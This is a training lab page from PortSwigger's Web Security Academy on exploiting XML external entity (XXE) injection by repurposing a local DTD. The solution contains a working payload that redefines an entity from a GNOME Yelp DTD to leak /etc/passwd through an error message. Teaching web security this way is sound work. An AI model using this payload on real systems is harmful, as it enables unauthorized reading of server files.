Burp Suite Enterprise Edition is now available in our secure Cloud  –  Learn more
Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Lab: Exploiting XXE to retrieve data by repurposing a local DTD

EXPERT

This lab has a "Check stock" feature that parses XML input but does not display the result.

To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

You'll need to reference an existing DTD file on the server and redefine an entity from it.

Hint

Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

ACCESS THE LAB

Solution

  1. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.

  2. Insert the following parameter entity definition in between the XML declaration and the stockCheck element:

    <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> This will import the Yelp DTD, then redefine the ISOamso entity, triggering an error message containing the contents of the /etc/passwd file.

Community solutions

Garr_7
Michael Sommer (no audio)

Register for free to track your learning progress

The benefits of working through PortSwigger's Web Security Academy

  • Practise exploiting vulnerabilities on realistic targets.

  • Record your progression from Apprentice to Expert.

  • See where you rank in our Hall of Fame.

Already got an account? Login here

Try Burp Suite for Free

Find XSS vulnerabilities using Burp Suite

Try for free